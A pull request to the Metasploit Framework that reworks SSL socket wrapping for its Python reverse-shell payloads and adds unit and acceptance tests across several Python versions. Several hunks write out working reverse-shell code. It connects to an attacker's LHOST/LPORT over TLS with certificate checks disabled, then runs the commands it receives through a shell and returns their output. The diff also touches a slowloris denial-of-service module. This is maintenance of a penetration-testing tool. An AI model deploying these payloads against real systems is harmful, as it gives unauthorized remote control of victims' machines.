### PR TITLE
Fix Python SSL Command Shell Payloads

### DIFF
--- a/.github/workflows/command_shell_acceptance.yml
+++ b/.github/workflows/command_shell_acceptance.yml
@@ -1,4 +1,3 @@
-
 name: Command Shell Acceptance
 
 # Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
@@ -46,8 +45,12 @@ on:
       - 'data/templates/**'
       - 'modules/payloads/**'
       - 'lib/msf/core/payload/**'
-      - 'lib/msf/core/**'
+      - 'lib/msf/core/handler/**'
+      - 'lib/msf/core/post/**'
+      - 'lib/msf/core/session/**'
+      - 'lib/msf/base/sessions/**'
       - 'tools/dev/**'
+      - 'test/modules/post/**'
       - 'spec/acceptance/**'
       - 'spec/support/acceptance/**'
       - 'spec/acceptance_spec_helper.rb'

--- a/.github/workflows/command_shell_acceptance.yml
+++ b/.github/workflows/command_shell_acceptance.yml
@@ -62,11 +62,6 @@ jobs:
     strategy:
       fail-fast: false
       matrix:
-        os:
-          - windows-2022
-          - ubuntu-latest
-        ruby:
-          - '3.4'
         include:
           # Powershell
           - { command_shell: { name: powershell }, ruby: '3.4', os: windows-2022 }

--- a/.github/workflows/command_shell_acceptance.yml
+++ b/.github/workflows/command_shell_acceptance.yml
@@ -81,6 +81,12 @@ jobs:
           # TODO: Tests currently fail:
           # - { command_shell: { name: cmd }, ruby: '3.4', os: windows-2025 }
 
+          # Python SSL
+          - { command_shell: { name: python_ssl_2_6  }, ruby: '3.4', os: ubuntu-latest }
+          - { command_shell: { name: python_ssl_2_7  }, ruby: '3.4', os: ubuntu-latest }
+          - { command_shell: { name: python_ssl_3_4  }, ruby: '3.4', os: ubuntu-latest }
+          - { command_shell: { name: python_ssl_3_13 }, ruby: '3.4', os: ubuntu-latest }
+
     runs-on: ${{ matrix.os }}
 
     timeout-minutes: 50
@@ -143,6 +149,11 @@ jobs:
           bundler-cache: true
           working-directory: metasploit-framework
           cache-version: 5
+
+      - name: Pull pyenv container image
+        if: startsWith(matrix.command_shell.name, 'python_ssl')
+        run: docker pull public.ecr.aws/n5b4u6h0/zerosteiner/pyenv@sha256:e686265001ee43333f14c896d8362970e816c5a7c661a6fa7e37a90770c9108a
+        working-directory: metasploit-framework
 
       - name: Acceptance
         env:

--- a/.github/workflows/command_shell_acceptance.yml
+++ b/.github/workflows/command_shell_acceptance.yml
@@ -41,7 +41,7 @@ on:
     branches:
       - '*'
     paths:
-      - 'metsploit-framework.gemspec'
+      - 'metasploit-framework.gemspec'
       - 'Gemfile.lock'
       - 'data/templates/**'
       - 'modules/payloads/**'

--- a/lib/msf/core/payload/python.rb
+++ b/lib/msf/core/payload/python.rb
@@ -24,4 +24,31 @@ module Msf::Payload::Python
     Msf::Payload::Python.create_exec_stub(python_code)
   end
 
+  # Generate a three-line Python snippet that wraps +in_var+ (a raw socket) into an SSL socket
+  # stored in +out_var+, compatible with Python 2.6 through 3.14+.
+  #
+  # The snippet is self-contained: it begins with its own `import ssl` so callers need not
+  # import ssl under any particular name. Python's import machinery makes redundant imports
+  # a no-op, and `import` is valid at any indentation level.
+  #
+  # Uses ssl.wrap_socket when available (Python 2.6–3.11), falling back to SSLContext with a
+  # getattr chain for the protocol constant (Python 3.12+ where wrap_socket was removed).
+  # The SSLContext setup runs inside an immediately-invoked lambda so no temporary variable
+  # leaks into the surrounding payload namespace.
+  #
+  # @param in_var [String] name of the raw socket variable
+  # @param out_var [String] name to assign the SSL socket to (defaults to in_var)
+  # @param indent [String] prefix for each generated line (e.g. "\t\t" inside a retry loop)
+  # @return [String] three-line Python snippet ending with a newline
+  def self.ssl_wrap_socket_stub(in_var, out_var = nil, indent: '')
+    out_var ||= in_var
+    "#{indent}import ssl\n" \
+    "#{indent}try:#{out_var}=ssl.wrap_socket(#{in_var})\n" \
+    "#{indent}except:#{out_var}=(lambda c:(setattr(c,'check_hostname',False),setattr(c,'verify_mode',ssl.CERT_NONE),c.wrap_socket(#{in_var}))[-1])(ssl.SSLContext(getattr(ssl,'PROTOCOL_TLS_CLIENT',getattr(ssl,'PROTOCOL_TLS',ssl.PROTOCOL_SSLv23))))\n"
+  end
+
+  def py_ssl_wrap_socket(in_var, out_var = nil, indent = '')
+    Msf::Payload::Python.ssl_wrap_socket_stub(in_var, out_var, indent: indent)
+  end
+
 end

--- a/lib/msf/core/payload/python.rb
+++ b/lib/msf/core/payload/python.rb
@@ -31,7 +31,7 @@ module Msf::Payload::Python
   # import ssl under any particular name. Python's import machinery makes redundant imports
   # a no-op, and `import` is valid at any indentation level.
   #
-  # Uses ssl.wrap_socket when available (Python 2.6–3.11), falling back to SSLContext with a
+  # Uses ssl.wrap_socket when available (Python 2.6-3.11), falling back to SSLContext with a
   # getattr chain for the protocol constant (Python 3.12+ where wrap_socket was removed).
   # The SSLContext setup runs inside an immediately-invoked lambda so no temporary variable
   # leaks into the surrounding payload namespace.

--- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb
+++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb
@@ -45,11 +45,11 @@ module Payload::Python::ReverseTcpSsl
 
   def generate_reverse_tcp_ssl(opts={})
     # Set up the socket
-    cmd  = "import zlib,base64,ssl,socket,struct#{opts[:retry_wait].to_i > 0 ? ',time' : ''}\n"
+    cmd  = "import zlib,base64,socket,struct#{opts[:retry_wait].to_i > 0 ? ',time' : ''}\n"
     if opts[:retry_wait].blank? # do not retry at all (old style)
       cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2
       cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n"
-      cmd << "s=ssl.wrap_socket(so)\n"
+      cmd << py_ssl_wrap_socket('so', 's')
     else
       if opts[:retry_count] > 0
         cmd << "for x in range(#{opts[:retry_count].to_i}):\n"
@@ -59,7 +59,7 @@ module Payload::Python::ReverseTcpSsl
       cmd << "\ttry:\n"
       cmd << "\t\tso=socket.socket(2,1)\n" # socket.AF_INET = 2
       cmd << "\t\tso.connect(('#{opts[:host]}',#{opts[:port]}))\n"
-      cmd << "\t\ts=ssl.wrap_socket(so)\n"
+      cmd << py_ssl_wrap_socket('so', 's', "\t\t")
       cmd << "\t\tbreak\n"
       cmd << "\texcept:\n"
       if opts[:retry_wait].to_i <= 0

--- a/modules/auxiliary/dos/http/slowloris.py
+++ b/modules/auxiliary/dos/http/slowloris.py
@@ -79,7 +79,13 @@ def init_socket(host, port, use_ssl=False, rand_user_agent=True):
     s.settimeout(4)
 
     if use_ssl:
-        s = ssl.wrap_socket(s)
+        try:
+            s = ssl.wrap_socket(s)
+        except AttributeError:
+            c = ssl.SSLContext(getattr(ssl, 'PROTOCOL_TLS_CLIENT', getattr(ssl, 'PROTOCOL_TLS', ssl.PROTOCOL_SSLv23)))
+            c.check_hostname = False
+            c.verify_mode = ssl.CERT_NONE
+            s = c.wrap_socket(s)
 
     s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
 

--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
@@ -52,10 +52,10 @@ module MetasploitModule
     cmd = ''
     dead = Rex::Text.rand_text_alpha(2)
     # Set up the socket
-    cmd += "import socket,subprocess,os,ssl\n"
+    cmd += "import socket,subprocess,os\n"
     cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
     cmd += "so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))\n"
-    cmd += "s=ssl.wrap_socket(so)\n"
+    cmd += py_ssl_wrap_socket('so', 's')
     # The actual IO
     cmd += "#{dead}=False\n"
     cmd += "while not #{dead}:\n"

--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
@@ -50,20 +50,18 @@ module MetasploitModule
   #
   def command_string
     cmd = ''
-    dead = Rex::Text.rand_text_alpha(2)
     # Set up the socket
     cmd += "import socket,subprocess,os\n"
     cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
     cmd += "so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))\n"
     cmd += py_ssl_wrap_socket('so', 's')
     # The actual IO
-    cmd += "#{dead}=False\n"
-    cmd += "while not #{dead}:\n"
+    cmd += "while True:\n"
     cmd += "\tdata=s.recv(1024)\n"
-    cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n"
+    cmd += "\tif len(data)==0:\n\t\tbreak\n"
     cmd += "\tproc=subprocess.Popen(data.decode('utf-8'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
-    cmd += "\ts.send(stdout_value)\n"
+    cmd += "\ts.sendall(stdout_value)\n"
     if datastore['PythonPath'].blank?
       return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | $(which python || which python3 || which python2) -"
     else

--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -42,22 +42,16 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    cmd = <<~PYTHON
-      import socket as s
-      import subprocess as r
-      import ssl
-      so=s.socket(s.AF_INET,s.SOCK_STREAM)
-      so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))
-      so=ssl.wrap_socket(so)
-      while True:
-      	d=so.recv(1024)
-      	if len(d)==0:
-      		break
-      	p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
-      	o=p.stdout.read()+p.stderr.read()
-      	so.sendall(o)
-    PYTHON
-
+    cmd  = "import socket as s,subprocess as r\n"
+    cmd += "so=s.socket(2,1)\n"
+    cmd += "so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))\n"
+    cmd += py_ssl_wrap_socket('so')
+    cmd += "while True:\n"
+    cmd += "\td=so.recv(1024)\n"
+    cmd += "\tif len(d)==0:\n\t\tbreak\n"
+    cmd += "\tp=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)\n"
+    cmd += "\to=p.stdout.read()+p.stderr.read()\n"
+    cmd += "\tso.sendall(o)\n"
     py_create_exec_stub(cmd)
   end
 end

--- a/spec/acceptance/command_shell_spec.rb
+++ b/spec/acceptance/command_shell_spec.rb
@@ -7,9 +7,13 @@ RSpec.describe 'CommandShell' do
   # Tests to ensure that CMD/Powershell/Linux is consistent across all implementations/operation systems
   COMMAND_SHELL_PAYLOADS = Acceptance::Session.with_session_name_merged(
     {
-      powershell: Acceptance::Session::POWERSHELL,
-      cmd: Acceptance::Session::CMD,
-      linux: Acceptance::Session::LINUX
+      powershell:      Acceptance::Session::POWERSHELL,
+      cmd:             Acceptance::Session::CMD,
+      linux:           Acceptance::Session::LINUX,
+      python_ssl_2_6:  Acceptance::Session::PYTHON_SSL_2_6,
+      python_ssl_2_7:  Acceptance::Session::PYTHON_SSL_2_7,
+      python_ssl_3_4:  Acceptance::Session::PYTHON_SSL_3_4,
+      python_ssl_3_13: Acceptance::Session::PYTHON_SSL_3_13,
     }
   )
 
@@ -133,7 +137,7 @@ RSpec.describe 'CommandShell' do
             end
 
             console.sendline payload.handler_command(default_module_datastore: default_module_datastore)
-            console.recvuntil(/Started reverse TCP handler[^\n]*\n/)
+            console.recvuntil(/Started reverse (?:TCP|SSL) handler[^\n]*\n/)
             payload_process = executed_payload
             session_id = nil
 

--- a/spec/lib/msf/core/payload/python_spec.rb
+++ b/spec/lib/msf/core/payload/python_spec.rb
@@ -18,4 +18,58 @@ RSpec.describe Msf::Payload::Python do
       expect(described_class.create_exec_stub(python_code)).to_not include(';')
     end
   end
+
+  describe '.ssl_wrap_socket_stub' do
+    subject(:stub) { described_class.ssl_wrap_socket_stub('so', 's') }
+
+    it 'returns exactly three lines' do
+      expect(stub.lines.length).to eq(3)
+    end
+
+    it 'begins with its own import ssl so callers need not pre-import ssl under any particular name' do
+      expect(stub.lines.first).to eq("import ssl\n")
+    end
+
+    it 'opens with a try branch that uses the legacy ssl.wrap_socket' do
+      expect(stub.lines[1]).to match(/^try:s=ssl\.wrap_socket\(so\)/)
+    end
+
+    it 'falls back via a lambda to avoid leaking a temporary variable into surrounding scope' do
+      expect(stub.lines.last).to include('lambda c:')
+    end
+
+    it 'contains the PROTOCOL_TLS_CLIENT getattr chain for broad version coverage' do
+      expect(stub).to include("getattr(ssl,'PROTOCOL_TLS_CLIENT',getattr(ssl,'PROTOCOL_TLS',ssl.PROTOCOL_SSLv23))")
+    end
+
+    it 'sets check_hostname before verify_mode to satisfy the Python >=3.4 ordering constraint' do
+      expect(stub.index('check_hostname')).to be < stub.index('verify_mode')
+    end
+
+    it 'assigns the wrapped socket to the out_var' do
+      expect(stub.lines.last).to match(/^except:s=/)
+    end
+
+    context 'when in_var and out_var are the same (in-place wrap)' do
+      subject(:stub) { described_class.ssl_wrap_socket_stub('so') }
+
+      it 'wraps so in place' do
+        expect(stub).to include('so=ssl.wrap_socket(so)')
+        expect(stub).to include('c.wrap_socket(so)')
+      end
+
+      it 'passes the original in_var to the lambda wrap_socket call' do
+        # the lambda arg (last wrap_socket call) must reference the raw socket, not the context
+        expect(stub.lines.last).to include('c.wrap_socket(so)')
+      end
+    end
+
+    context 'with an indent prefix' do
+      subject(:stub) { described_class.ssl_wrap_socket_stub('so', 's', indent: "\t\t") }
+
+      it 'prefixes all three lines with the indent' do
+        expect(stub.lines).to all(start_with("\t\t"))
+      end
+    end
+  end
 end

--- a/spec/support/acceptance/command_shell/python_ssl.rb
+++ b/spec/support/acceptance/command_shell/python_ssl.rb
@@ -1,0 +1,77 @@
+# frozen_string_literal: true
+
+module Acceptance::Session
+  PYTHON_SSL_IMAGE = 'public.ecr.aws/n5b4u6h0/zerosteiner/pyenv@sha256:e686265001ee43333f14c896d8362970e816c5a7c661a6fa7e37a90770c9108a'
+  PYTHON_SSL_CONTAINER_CMD = '$(command -v podman || command -v docker)'
+
+  PYTHON_SSL_MODULE_TESTS = [
+    {
+      name: 'post/test/unix',
+      platforms: [
+        :linux,
+        :osx,
+        [
+          :windows,
+          {
+            skip: true,
+            reason: 'Unix only test'
+          }
+        ]
+      ],
+      skipped: false,
+      lines: {
+        linux: { known_failures: [] },
+        osx:   { known_failures: [] },
+        windows: { known_failures: [] }
+      }
+    }
+  ].freeze
+
+  def self.python_ssl_config(pyenv_version)
+    image = PYTHON_SSL_IMAGE
+    runtime = PYTHON_SSL_CONTAINER_CMD
+
+    {
+      payloads: [
+        {
+          name: 'python/shell_reverse_tcp_ssl',
+          extension: '.py',
+          platforms: [:linux],
+          execute_cmd: [
+            'bash', '-c',
+            "#{runtime} run --rm --network host -v \${payload_path}:\${payload_path}:Z -e PYENV_VERSION=#{pyenv_version} #{image} python \${payload_path}"
+          ],
+          generate_options: {
+            '-f': 'raw'
+          },
+          datastore: {
+            global: {},
+            module: {}
+          }
+        },
+        {
+          name: 'cmd/unix/reverse_python_ssl',
+          extension: '.sh',
+          platforms: [:linux],
+          execute_cmd: [
+            'bash', '-c',
+            "#{runtime} run --rm --network host -v \${payload_path}:\${payload_path}:Z -e PYENV_VERSION=#{pyenv_version} #{image} sh \${payload_path}"
+          ],
+          generate_options: {
+            '-f': 'raw'
+          },
+          datastore: {
+            global: {},
+            module: {}
+          }
+        }
+      ],
+      module_tests: PYTHON_SSL_MODULE_TESTS
+    }
+  end
+
+  PYTHON_SSL_2_6  = python_ssl_config('2.6.9-no-pip')
+  PYTHON_SSL_2_7  = python_ssl_config('2.7.18')
+  PYTHON_SSL_3_4  = python_ssl_config('3.4.10')
+  PYTHON_SSL_3_13 = python_ssl_config('3.13.7')
+end


### PR DESCRIPTION
Fixes SSL command shell payloads for Python by consolidating the SSL wrapping logic. It also adds tests to the command shell acceptance tests to catch regressions in the future. The tests cover Python 2.6 (where SSL was introduced) 2.7, 3.4 and 3.13 which together mark the boundaries of some edge cases the code works through. Fixes #21301 and supersedes the PRs that previously attempted to close that issue.


## Verification

List the steps needed to make sure this thing works

- [ ] Tests should pass
- [ ] Do a spot check with one of the new SSL payloads, see it work